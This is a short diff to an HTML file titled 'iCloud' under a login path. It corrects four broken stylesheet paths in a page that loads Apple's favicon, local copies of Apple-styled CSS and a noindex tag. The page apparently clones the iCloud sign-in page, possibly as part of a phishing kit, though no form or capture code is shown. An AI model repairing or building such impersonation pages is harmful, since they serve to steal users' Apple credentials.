--- a/login/r/index.html
+++ b/login/r/index.html
@@ -6,11 +6,11 @@
 	<meta content="width=device-width, initial-scale=1" name="viewport">
 	<meta name="robots" content="noindex, nofollow">
 	<title>iCloud</title>
-	<link rel="stylesheet" href=".../index_files/strap.css">
+	<link rel="stylesheet" href="../index_files/strap.css">
     <link rel="shortcut icon" type="image/x-icon" href="https://appleid.cdn-apple.com/static/bin/cb3606853004/images/favicon.ico">
-	<link rel="stylesheet" href=".../index_files/apple.css">
-	<link rel="stylesheet" href=".../index_files/kit.css">
-	<link rel="stylesheet" href=".../index_files/animate.css">	
+	<link rel="stylesheet" href="../index_files/apple.css">
+	<link rel="stylesheet" href="../index_files/kit.css">
+	<link rel="stylesheet" href="../index_files/animate.css">	
 </head>
 <body>
 
